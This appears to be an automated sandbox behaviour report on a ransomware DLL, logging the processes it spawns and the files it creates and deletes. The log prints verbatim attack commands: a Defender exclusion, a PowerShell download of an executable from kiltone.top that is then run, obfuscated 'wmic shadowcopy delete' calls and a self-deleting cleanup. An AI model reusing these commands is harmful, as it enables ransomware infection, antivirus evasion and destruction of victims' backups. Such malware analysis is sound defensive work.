Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\saved-telemetry-pings\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\security_state\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\sessionstore-backups\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\storage\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\storage\permanent\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\storage\permanent\chrome\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595amcateirvtisty.files\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\storage\to-be-removed\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\kz8kl7vh.default\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\contacts\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\cookies\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\downloads\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\favorites\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\favorites\links\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\links\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\onedrive\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\recent\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\saved games\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\searches\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\accountpictures\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\documents\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\documents\my music\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\documents\my pictures\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\documents\my videos\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\downloads\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\libraries\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile moved: C:\Users\user\Desktop\SQSJKEBWDT.jpgJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile deleted: C:\Users\user\Desktop\SQSJKEBWDT.jpgJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile moved: C:\Users\user\Desktop\GAOBCVIQIJ.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile deleted: C:\Users\user\Desktop\GAOBCVIQIJ.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile moved: C:\Users\user\Desktop\QNCYCDFIJJ.pdfJump to behavior

System Summary

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\eryy65ty.exeJump to dropped file
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D41AD660_2_6D41AD66
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D40C7230_2_6D40C723
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D41E9D20_2_6D41E9D2
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D4181F90_2_6D4181F9
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D41436A0_2_6D41436A
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D40F2400_2_6D40F240
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D41EAFF0_2_6D41EAFF
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D402A800_2_6D402A80
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E7A0D620_2_00E7A0D6
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E3C79020_2_00E3C790
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E509C020_2_00E509C0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E38E0020_2_00E38E00
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E6FE2020_2_00E6FE20
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E7609320_2_00E76093
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E842A020_2_00E842A0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E7A53120_2_00E7A531
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E9E66B20_2_00E9E66B
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E9264120_2_00E92641
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E767E920_2_00E767E9
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E8474020_2_00E84740
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E848C020_2_00E848C0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E9A9B720_2_00E9A9B7
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00EAEA7220_2_00EAEA72
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E82BC020_2_00E82BC0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E9ABDF20_2_00E9ABDF
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E4EB2020_2_00E4EB20
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E78DCC20_2_00E78DCC
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E78DBF20_2_00E78DBF
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E58D9020_2_00E58D90
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E7CD9020_2_00E7CD90
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E84D0020_2_00E84D00
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E46EA020_2_00E46EA0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00EA2E5320_2_00EA2E53
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E9AE0720_2_00E9AE07
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E7AFC020_2_00E7AFC0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E76F3F20_2_00E76F3F
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E74F3A20_2_00E74F3A
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00EB10A820_2_00EB10A8
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E8705020_2_00E87050
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E7B1D020_2_00E7B1D0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00EB11D520_2_00EB11D5
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E7912620_2_00E79126
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E6F20020_2_00E6F200
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E7520C20_2_00E7520C
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E7B46020_2_00E7B460
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E855C020_2_00E855C0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00EA957920_2_00EA9579
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E5154020_2_00E51540
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E8751020_2_00E87510
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E776DC20_2_00E776DC
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E7B64020_2_00E7B640
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E3B79020_2_00E3B790
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E4D79020_2_00E4D790
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E7593D20_2_00E7593D
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E79A6F20_2_00E79A6F
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E33B2020_2_00E33B20
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E9FCC020_2_00E9FCC0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E79C9320_2_00E79C93
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E57C7020_2_00E57C70
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E89C0020_2_00E89C00
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E8FDE020_2_00E8FDE0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E87F1020_2_00E87F10
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\eryy65ty.exe D2100FFE58EB50C05D97A3DA738CCD1F0BE9672C057C26A10140AF80595B78C3
Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6D4087F0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: String function: 00E8D9BB appears 52 times
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: String function: 00E8E6C0 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: String function: 00E462B0 appears 57 times
Source: TD2HjoogPx.dllStatic PE information: invalid certificate
Source: TD2HjoogPx.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winDLL@62/710@1/1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E3ABA0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,20_2_00E3ABA0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E3ABA0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,20_2_00E3ABA0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\Desktop\Decryptfiles.txtJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6276:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6848:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqpkpgtj.bos.ps1Jump to behavior
Source: TD2HjoogPx.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile read: \Device\CdRom0\sources\cversion.iniJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1
Source: TD2HjoogPx.dllVirustotal: Detection: 44%
Source: TD2HjoogPx.dllReversingLabs: Detection: 36%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\xGRceo\xGRc\..\..\Windows\xGRc\xGRc\..\..\system32\xGRc\xGRc\..\..\wbem\xGRc\xGRce\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ZiHrdF\ZiHr\..\..\Windows\ZiHr\ZiHr\..\..\system32\ZiHr\ZiHr\..\..\wbem\ZiHr\ZiHrd\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\klzShx\klzS\..\..\Windows\klzS\klzS\..\..\system32\klzS\klzS\..\..\wbem\klzS\klzSh\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\NTdKVj\NTdK\..\..\Windows\NTdK\NTdK\..\..\system32\NTdK\NTdK\..\..\wbem\NTdK\NTdKV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exeJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/eryy65ty.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/eryy65ty.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy deleteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\xGRceo\xGRc\..\..\Windows\xGRc\xGRc\..\..\system32\xGRc\xGRc\..\..\wbem\xGRc\xGRce\..\..\wmic.exe shadowcopy deleteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\klzShx\klzS\..\..\Windows\klzS\klzS\..\..\system32\klzS\klzS\..\..\wbem\klzS\klzSh\..\..\wmic.exe shadowcopy deleteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ZiHrdF\ZiHr\..\..\Windows\ZiHr\ZiHr\..\..\system32\ZiHr\ZiHr\..\..\wbem\ZiHr\ZiHrd\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\NTdKVj\NTdK\..\..\Windows\NTdK\NTdK\..\..\system32\NTdK\NTdK\..\..\wbem\NTdK\NTdKV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
